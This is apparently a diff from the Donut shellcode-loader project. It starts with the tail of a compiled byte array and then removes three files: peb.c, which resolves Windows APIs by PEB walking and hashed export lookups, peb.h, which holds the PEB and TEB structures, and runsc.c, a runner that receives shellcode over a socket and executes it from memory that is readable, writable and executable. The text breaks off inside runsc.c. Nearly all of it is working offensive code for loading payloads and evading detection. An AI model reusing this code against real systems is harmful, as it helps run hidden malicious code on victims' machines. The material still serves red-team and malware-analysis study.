613 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0, 0x8d, 0x7c, 0x24,
614 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x28, 0x8b,
615 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf3,
616 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b, 0x7c, 0x24, 0x18,
617 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10, 0x00, 0x00, 0x00,
618 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9, 0xc1, 0xc6, 0x08,
619 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce, 0xc1, 0xc7, 0x07,
620 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0, 0x10, 0x83, 0x6c,
621 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28, 0x89, 0x4c, 0x24,
622 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c, 0x24, 0x18, 0x89,
623 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44, 0x8c, 0x14, 0x41,
624 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34, 0x8b, 0xca, 0x6a,
625 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9, 0x7e, 0x19, 0x8d,
626 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9, 0x8a, 0x04, 0x37,
627 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b, 0x6c, 0x24, 0x34,
628 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80, 0x01, 0x01, 0x75,
629 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3, 0x8b, 0x44, 0x24,
630 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x5d,
631 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x8b, 0x44, 0x24,
632 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74, 0x13, 0x57, 0x8b, 0x7c, 0x24,
633 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88, 0x0e, 0x46, 0x83, 0xea, 0x01,
634 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44, 0x24, 0x08, 0x8b, 0x4c, 0x24,
635 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3, 0xaa, 0x8b, 0x44, 0x24, 0x08,
636 0x5f, 0xc3};
637
+0
-149
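--- a/payload/peb.c
+++ b/payload/peb.c
@@ -1,149 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-// locate address of API in export table using Maru hash function
-LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
-PIMAGE_DOS_HEADER dos;
-PIMAGE_NT_HEADERS nt;
-DWORD i, j, cnt, rva;
-PIMAGE_DATA_DIRECTORY dir;
-PIMAGE_EXPORT_DIRECTORY exp;
-PDWORD adr;
-PDWORD sym;
-PWORD ord;
-PCHAR api, dll, p;
-LPVOID addr=NULL;
-ULONG64 dll_hash;
-CHAR buf[MAX_PATH], dll_name[64], api_name[128];
-
-dos = (PIMAGE_DOS_HEADER)base;
-nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
-dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
-rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
-
-// if no export table, return NULL
-if (rva==0) return NULL;
-
-exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
-cnt = exp->NumberOfNames;
-
-// if no api names, return NULL
-if (cnt==0) return NULL;
-
-adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
-sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
-ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
-dll = RVA2VA(PCHAR, base, exp->Name);
-
-// get hash of DLL string converted to lowercase
-for(i=0;dll[i]!=0;i++) {
-buf[i] = dll[i] | 0x20;
-}
-buf[i] = 0;
-dll_hash = maru(buf, iv);
-
-do {
-// calculate hash of api string
-api = RVA2VA(PCHAR, base, sym[cnt-1]);
-// xor with DLL hash and compare with hash to find
-if ((maru(api, iv) ^ dll_hash) == api_hash) {
-// return address of function
-addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
-
-// is this a forward reference?
-if ((PBYTE)addr >= (PBYTE)exp &&
-(PBYTE)addr < (PBYTE)exp +
-dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
-{
-DPRINT("%016llx is forwarded to %s",
-api_hash, (char*)addr);
-
-// copy DLL name to buffer
-p=(char*)addr;
-
-for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
-dll_name[i] = p[i];
-if(p[i] == '.') break;
-}
-
-dll_name[i+1] = 'd';
-dll_name[i+2] = 'l';
-dll_name[i+3] = 'l';
-dll_name[i+4] = 0;
-
-p += i + 1;
-
-// copy API name to buffer
-for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
-api_name[i] = p[i];
-}
-api_name[i] = 0;
-
-DPRINT("Trying to load %s", dll_name);
-HMODULE hModule = inst->api.LoadLibrary(dll_name);
-
-if(hModule != NULL) {
-DPRINT("Calling GetProcAddress(%s)", api_name);
-addr = inst->api.GetProcAddress(hModule, api_name);
-} else addr = NULL;
-}
-return addr;
-}
-} while (--cnt && addr == NULL);
-
-return addr;
-}
-
-// search all modules in the PEB for API
-LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
-PPEB peb;
-PPEB_LDR_DATA ldr;
-PLDR_DATA_TABLE_ENTRY dte;
-LPVOID addr = NULL;
-
-#if defined(_WIN64)
-peb = (PPEB) __readgsqword(0x60);
-#else
-peb = (PPEB) __readfsdword(0x30);
-#endif
-
-ldr = (PPEB_LDR_DATA)peb->Ldr;
-
-// for each DLL loaded
-for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
-dte->DllBase != NULL && addr == NULL;
-dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
-{
-// search the export table for api
-addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
-}
-return addr;
-}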
+0
-360
payload/peb.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _RTL_USER_PROCESS_PARAMETERS {
45 BYTE Reserved1[16];
46 PVOID Reserved2[10];
47 UNICODE_STRING ImagePathName;
48 UNICODE_STRING CommandLine;
49 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
50
51 // PEB defined by rewolf
52 // http://blog.rewolf.pl/blog/?p=573
53 typedef struct _PEB_LDR_DATA {
54 ULONG Length;
55 BOOL Initialized;
56 LPVOID SsHandle;
57 LIST_ENTRY InLoadOrderModuleList;
58 LIST_ENTRY InMemoryOrderModuleList;
59 LIST_ENTRY InInitializationOrderModuleList;
60 } PEB_LDR_DATA, *PPEB_LDR_DATA;
61
62 typedef struct _LDR_DATA_TABLE_ENTRY
63 {
64 LIST_ENTRY InLoadOrderLinks;
65 LIST_ENTRY InMemoryOrderLinks;
66 LIST_ENTRY InInitializationOrderLinks;
67 LPVOID DllBase;
68 LPVOID EntryPoint;
69 ULONG SizeOfImage;
70 UNICODE_STRING FullDllName;
71 UNICODE_STRING BaseDllName;
72 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
73
74 typedef struct _PEB {
75 BYTE InheritedAddressSpace;
76 BYTE ReadImageFileExecOptions;
77 BYTE BeingDebugged;
78 BYTE _SYSTEM_DEPENDENT_01;
79
80 LPVOID Mutant;
81 LPVOID ImageBaseAddress;
82
83 PPEB_LDR_DATA Ldr;
84 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
85 LPVOID SubSystemData;
86 LPVOID ProcessHeap;
87 LPVOID FastPebLock;
88 LPVOID _SYSTEM_DEPENDENT_02;
89 LPVOID _SYSTEM_DEPENDENT_03;
90 LPVOID _SYSTEM_DEPENDENT_04;
91 union {
92 LPVOID KernelCallbackTable;
93 LPVOID UserSharedInfoPtr;
94 };
95 DWORD SystemReserved;
96 DWORD _SYSTEM_DEPENDENT_05;
97 LPVOID _SYSTEM_DEPENDENT_06;
98 LPVOID TlsExpansionCounter;
99 LPVOID TlsBitmap;
100 DWORD TlsBitmapBits[2];
101 LPVOID ReadOnlySharedMemoryBase;
102 LPVOID _SYSTEM_DEPENDENT_07;
103 LPVOID ReadOnlyStaticServerData;
104 LPVOID AnsiCodePageData;
105 LPVOID OemCodePageData;
106 LPVOID UnicodeCaseTableData;
107 DWORD NumberOfProcessors;
108 union
109 {
110 DWORD NtGlobalFlag;
111 LPVOID dummy02;
112 };
113 LARGE_INTEGER CriticalSectionTimeout;
114 LPVOID HeapSegmentReserve;
115 LPVOID HeapSegmentCommit;
116 LPVOID HeapDeCommitTotalFreeThreshold;
117 LPVOID HeapDeCommitFreeBlockThreshold;
118 DWORD NumberOfHeaps;
119 DWORD MaximumNumberOfHeaps;
120 LPVOID ProcessHeaps;
121 LPVOID GdiSharedHandleTable;
122 LPVOID ProcessStarterHelper;
123 LPVOID GdiDCAttributeList;
124 LPVOID LoaderLock;
125 DWORD OSMajorVersion;
126 DWORD OSMinorVersion;
127 WORD OSBuildNumber;
128 WORD OSCSDVersion;
129 DWORD OSPlatformId;
130 DWORD ImageSubsystem;
131 DWORD ImageSubsystemMajorVersion;
132 LPVOID ImageSubsystemMinorVersion;
133 union
134 {
135 LPVOID ImageProcessAffinityMask;
136 LPVOID ActiveProcessAffinityMask;
137 };
138 #ifdef _WIN64
139 LPVOID GdiHandleBuffer[64];
140 #else
141 LPVOID GdiHandleBuffer[32];
142 #endif
143 LPVOID PostProcessInitRoutine;
144 LPVOID TlsExpansionBitmap;
145 DWORD TlsExpansionBitmapBits[32];
146 LPVOID SessionId;
147 ULARGE_INTEGER AppCompatFlags;
148 ULARGE_INTEGER AppCompatFlagsUser;
149 LPVOID pShimData;
150 LPVOID AppCompatInfo;
151 PUNICODE_STRING CSDVersion;
152 LPVOID ActivationContextData;
153 LPVOID ProcessAssemblyStorageMap;
154 LPVOID SystemDefaultActivationContextData;
155 LPVOID SystemAssemblyStorageMap;
156 LPVOID MinimumStackCommit;
157 } PEB, *PPEB;
158
159
160 typedef struct _CLIENT_ID {
161 HANDLE UniqueProcess;
162 HANDLE UniqueThread;
163 } CLIENT_ID, *PCLIENT_ID;
164
165 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
166 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
167 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
168 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
169
170 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
171 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
172 PACTIVATION_CONTEXT *ActivationContext;
173 ULONG Flags;
174 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
175
176 typedef struct _ACTIVATION_CONTEXT_STACK
177 {
178 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
179 LIST_ENTRY FrameListCache;
180 ULONG Flags;
181 ULONG NextCookieSequenceNumber;
182 ULONG StackId;
183 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
184 #define GDI_BATCH_BUFFER_SIZE 310
185
186 typedef struct _GDI_TEB_BATCH
187 {
188 ULONG Offset;
189 ULONG_PTR HDC;
190 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
191 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
192
193 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
194 {
195 ULONG Flags;
196 PSTR FrameName;
197 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
198
199 typedef struct _TEB_ACTIVE_FRAME
200 {
201 ULONG Flags;
202 struct _TEB_ACTIVE_FRAME *Previous;
203 PTEB_ACTIVE_FRAME_CONTEXT Context;
204 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
205
206 #if !defined(_MSC_VER)
207 typedef struct _PROCESSOR_NUMBER {
208 USHORT Group;
209 UCHAR Number;
210 UCHAR Reserved;
211 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
212 #endif
213
214 typedef struct _TEB
215 {
216 NT_TIB NtTib;
217
218 PVOID EnvironmentPointer;
219 CLIENT_ID ClientId;
220 PVOID ActiveRpcHandle;
221 PVOID ThreadLocalStoragePointer;
222 PPEB ProcessEnvironmentBlock;
223
224 ULONG LastErrorValue;
225 ULONG CountOfOwnedCriticalSections;
226 PVOID CsrClientThread;
227 PVOID Win32ThreadInfo;
228 ULONG User32Reserved[26];
229 ULONG UserReserved[5];
230 PVOID WOW32Reserved;
231 LCID CurrentLocale;
232 ULONG FpSoftwareStatusRegister;
233 PVOID SystemReserved1[54];
234 NTSTATUS ExceptionCode;
235 PVOID ActivationContextStackPointer;
236 #ifdef _M_X64
237 UCHAR SpareBytes[24];
238 #else
239 UCHAR SpareBytes[36];
240 #endif
241 ULONG TxFsContext;
242
243 GDI_TEB_BATCH GdiTebBatch;
244 CLIENT_ID RealClientId;
245 HANDLE GdiCachedProcessHandle;
246 ULONG GdiClientPID;
247 ULONG GdiClientTID;
248 PVOID GdiThreadLocalInfo;
249 ULONG_PTR Win32ClientInfo[62];
250 PVOID glDispatchTable[233];
251 ULONG_PTR glReserved1[29];
252 PVOID glReserved2;
253 PVOID glSectionInfo;
254 PVOID glSection;
255 PVOID glTable;
256 PVOID glCurrentRC;
257 PVOID glContext;
258
259 NTSTATUS LastStatusValue;
260 UNICODE_STRING StaticUnicodeString;
261 WCHAR StaticUnicodeBuffer[261];
262
263 PVOID DeallocationStack;
264 PVOID TlsSlots[64];
265 LIST_ENTRY TlsLinks;
266
267 PVOID Vdm;
268 PVOID ReservedForNtRpc;
269 PVOID DbgSsReserved[2];
270
271 ULONG HardErrorMode;
272 #ifdef _M_X64
273 PVOID Instrumentation[11];
274 #else
275 PVOID Instrumentation[9];
276 #endif
277 GUID ActivityId;
278
279 PVOID SubProcessTag;
280 PVOID EtwLocalData;
281 PVOID EtwTraceData;
282 PVOID WinSockData;
283 ULONG GdiBatchCount;
284
285 union
286 {
287 PROCESSOR_NUMBER CurrentIdealProcessor;
288 ULONG IdealProcessorValue;
289 struct
290 {
291 UCHAR ReservedPad0;
292 UCHAR ReservedPad1;
293 UCHAR ReservedPad2;
294 UCHAR IdealProcessor;
295 };
296 };
297
298 ULONG GuaranteedStackBytes;
299 PVOID ReservedForPerf;
300 PVOID ReservedForOle;
301 ULONG WaitingOnLoaderLock;
302 PVOID SavedPriorityState;
303 ULONG_PTR SoftPatchPtr1;
304 PVOID ThreadPoolData;
305 PVOID *TlsExpansionSlots;
306 #ifdef _M_X64
307 PVOID DeallocationBStore;
308 PVOID BStoreLimit;
309 #endif
310 ULONG MuiGeneration;
311 ULONG IsImpersonating;
312 PVOID NlsCache;
313 PVOID pShimData;
314 ULONG HeapVirtualAffinity;
315 HANDLE CurrentTransactionHandle;
316 PTEB_ACTIVE_FRAME ActiveFrame;
317 PVOID FlsData;
318
319 PVOID PreferredLanguages;
320 PVOID UserPrefLanguages;
321 PVOID MergedPrefLanguages;
322 ULONG MuiImpersonation;
323
324 union
325 {
326 USHORT CrossTebFlags;
327 USHORT SpareCrossTebBits : 16;
328 };
329 union
330 {
331 USHORT SameTebFlags;
332 struct
333 {
334 USHORT SafeThunkCall : 1;
335 USHORT InDebugPrint : 1;
336 USHORT HasFiberData : 1;
337 USHORT SkipThreadAttach : 1;
338 USHORT WerInShipAssertCode : 1;
339 USHORT RanProcessInit : 1;
340 USHORT ClonedThread : 1;
341 USHORT SuppressDebugMsg : 1;
342 USHORT DisableUserStackWalk : 1;
343 USHORT RtlExceptionAttached : 1;
344 USHORT InitialThread : 1;
345 USHORT SessionAware : 1;
346 USHORT SpareSameTebBits : 4;
347 };
348 };
349
350 PVOID TxnScopeEnterCallback;
351 PVOID TxnScopeExitCallback;
352 PVOID TxnScopeContext;
353 ULONG LockCount;
354 ULONG SpareUlong0;
355 PVOID ResourceRetValue;
356 PVOID ReservedForWdf;
357 } TEB, *PTEB;
358
359 #endif
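--- a/payload/runsc.c
+++ b/payload/runsc.c
@@ -1,734 +0,0 @@
-
-/**
-Copyright © 2016-2019 Odzhan. All Rights Reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
-1. Redistributions of source code must retain the above copyright
-notice, this list of conditions and the following disclaimer.
-
-2. Redistributions in binary form must reproduce the above copyright
-notice, this list of conditions and the following disclaimer in the
-documentation and/or other materials provided with the distribution.
-
-3. The name of the author may not be used to endorse or promote products
-derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
-IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
-INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGE. */
-
-#if defined(_WIN32) || defined(_WIN64)
-#ifndef _WIN32_WINNT
-#define _WIN32_WINNT 0x0502
-#endif
-#define WIN
-#ifndef _WINSOCKAPI_
-#define _WINSOCKAPI_
-#endif
-#include <windows.h>
-#include <shlwapi.h>
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#define close closesocket
-#define SHUT_RDWR SD_BOTH
-#pragma comment(lib, "ws2_32.lib")
-#pragma comment(lib, "shlwapi.lib")
-#else
-#include <unistd.h>
-#include <sys/socket.h>
-#include <sys/types.h>
-#include <sys/mman.h>
-#include <arpa/inet.h>
-#include <netdb.h>
-#include <netinet/in.h>
-#include <sys/ioctl.h>
-#include <net/if.h>
-#include <signal.h>
-#include <fcntl.h>
-#endif
-
-#include <stdio.h>
-#include <stdint.h>
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#include <sys/stat.h>
-
-#define RSC_CLIENT 0
-#define RSC_SERVER 1
-#define RSC_EXEC 2
-
-#define RSC_SEND 0
-#define RSC_RECV 1
-
-#define DEFAULT_PORT "4444"
-
-// structure for parameters
-typedef struct _args_t {
-int s, r;
-char *port, *address, *file;
-#ifdef WIN
-char *modules;
-#endif
-int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
-struct sockaddr *ai_addr;
-struct sockaddr_in v4;
-struct sockaddr_in6 v6;
-char ip[INET6_ADDRSTRLEN];
-uint32_t code_len;
-void *code;
-} args_t;
-
-#ifdef WIN
-/**F*****************************************************************/
-void xstrerror (char *fmt, ...)
-/**
-* PURPOSE : Display windows error
-*
-* RETURN : Nothing
-*
-* NOTES : None
-*
-*F*/
-{
-char *error=NULL;
-va_list arglist;
-char buffer[2048];
-DWORD dwError=GetLastError();
-
-va_start (arglist, fmt);
-wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
-va_end (arglist);
-
-if (FormatMessage (
-FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
-NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
-(LPSTR)&error, 0, NULL))
-{
-printf ("[ %s : %s\n", buffer, error);
-LocalFree (error);
-} else {
-printf ("[ %s : %i\n", buffer, dwError);
-}
-}
-#else
-#define xstrerror printf
-#endif
-
-char *addr2ip(args_t *p)
-{
-void *src;
-#ifdef WIN
-DWORD ip_size=INET6_ADDRSTRLEN;
-WSAAddressToString (p->ai_addr, p->ai_addrlen,
-NULL, (char*)p->ip, &ip_size);
-#else
-if (p->ai_family==AF_INET) {
-src=(void*)&p->v4.sin_addr;
-} else {
-src=(void*)&p->v6.sin6_addr;
-}
-inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
-#endif
-return p->ip;
-}
-
-int init_network (args_t *p)
-/**
-* PURPOSE : initialize winsock for windows, resolve network address
-*
-* RETURN : 1 for okay else 0
-*
-* NOTES : None
-*
-*F*/
-{
-struct addrinfo *list=NULL, *e=NULL;
-struct addrinfo hints;
-int r, t;
-
-// initialize winsock if windows
-#ifdef WIN
-WSADATA wsa;
-WSAStartup (MAKEWORD (2, 0), &wsa);
-#endif
-
-r=0;
-// set network address length to zero
-p->ai_addrlen = 0;
-
-// if no address supplied
-if (p->address==NULL)
-{
-// is it ipv4?
-if (p->ai_family==AF_INET) {
-p->v4.sin_family = AF_INET;
-p->v4.sin_port = htons((u_short)p->port_nbr);
-p->v4.sin_addr.s_addr = INADDR_ANY;
-p->ai_addr = (struct sockaddr*)&p->v4;
-p->ai_addrlen = sizeof (struct sockaddr_in);
-} else {
-// else it's ipv6
-p->v6.sin6_family = AF_INET6;
-p->v6.sin6_port = htons((u_short)p->port_nbr);
-p->v6.sin6_addr = in6addr_any;
-p->ai_addr = (struct sockaddr*)&p->v6;
-p->ai_addrlen = sizeof (struct sockaddr_in6);
-}
-} else {
-memset (&hints, 0, sizeof (hints));
-
-hints.ai_flags = AI_PASSIVE;
-hints.ai_family = p->ai_family;
-hints.ai_socktype = SOCK_STREAM;
-hints.ai_protocol = IPPROTO_TCP;
-
-// get all network addresses
-t=getaddrinfo (p->address, p->port, &hints, &list);
-if (t == 0)
-{
-for (e=list; e!=NULL; e=e->ai_next)
-{
-// copy to ipv4 structure
-if (p->ai_family==AF_INET) {
-memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
-p->ai_addr = (struct sockaddr*)&p->v4;
-} else {
-// ipv6 structure
-memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
-p->ai_addr = (struct sockaddr*)&p->v6;
-}
-// assign size of structure
-p->ai_addrlen = e->ai_addrlen;
-break;
-}
-freeaddrinfo (list);
-} else {
-xstrerror ("getaddrinfo");
-}
-}
-return p->ai_addrlen;
-}
-
-void debug(void *bin)
-{
-//
-//__builtin_trap();
-//raise(SIGTRAP);
-}
-
-// allocate read/write and executable memory
-// copy data from p->code and execute
-void xcode(args_t *p)
-{
-void *bin;
-int i;
-int fd[2048];
-
-if (p->code_len == 0) {
-printf("[ no code to execute.\n");
-return;
-}
-printf ("[ executing code...");
-
-#ifdef WIN
-bin=VirtualAlloc (0, p->code_len,
-MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-#else
-bin=mmap (0, p->code_len,
-PROT_EXEC | PROT_WRITE | PROT_READ,
-MAP_ANON | MAP_PRIVATE, -1, 0);
-#endif
-if (bin!=NULL)
-{
-memcpy (bin, p->code, p->code_len);
-// create file/socket descriptors to simulate real system
-// created interesting results on openbsd with limits
-// to how many files could be open at once..
-//
-if (p->sim) {
-#ifndef WIN
-for (i=0; i<p->sim && p->sim<2048; i++) {
-fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
-}
-#else
-// todo
-for (i=0; i<p->sim && p->sim<2048; i++) {
-}
-#endif
-}
-
-// debug the code?
-if (p->dbg) {
-#if defined(_WIN32) || defined(_WIN64)
-DebugBreak();
-#else
-raise(SIGTRAP);
-#endif
-}
-// execute
-((void(*)())bin)();
-printf("OK!\n");
-if (p->sim) {
-#ifndef WIN
-// close all descriptors
-for (i=0; i<p->sim && p->sim<2048; i++) {
-close(fd[i]);
-}
-#else
-// todo
-#endif
-}
-#ifdef WIN
-VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
-#else
-munmap (bin, p->code_len);
-#endif
-}
-}
-
-void send_data(args_t *p, int s) {
-FILE *fd;
-int outlen, len, opt;
-uint32_t sum;
-uint8_t buf[BUFSIZ];
-
-// open file for read in binary mode
-printf ("[ opening %s for read\n", p->file);
-fd = fopen(p->file, "rb");
-
-if (fd != NULL)
-{
-// send contents of file
-printf ("[ sending data\n");
-for (;;) {
-// read block
-outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
-// zero or less indicates EOF
-if (outlen <= 0) break;
-// send contents
-for (sum=0; sum<outlen; sum += len) {
-len=send (s, &buf[sum], outlen - sum, 0);
-if (len <= 0) break;
-}
-p->code_len += sum;
-if (outlen != sum) break;
-}
-printf ("[ sent %i bytes\n", p->code_len);
-fclose(fd);
-}
-}
-
-void recv_data(args_t *p, int s) {
-int opt, r;
-fd_set fds;
-struct timeval tv;
-void *pv;
-
-p->code_len = 0;
-p->code = malloc(BUFSIZ);
-
-// set to non-blocking mode
-#ifdef WIN
-opt=1;
-ioctlsocket (s, FIONBIO, (u_long*)&opt);
-#else
-opt=fcntl(s, F_GETFL, 0);
-fcntl(s, F_SETFL, opt | O_NONBLOCK);
-#endif
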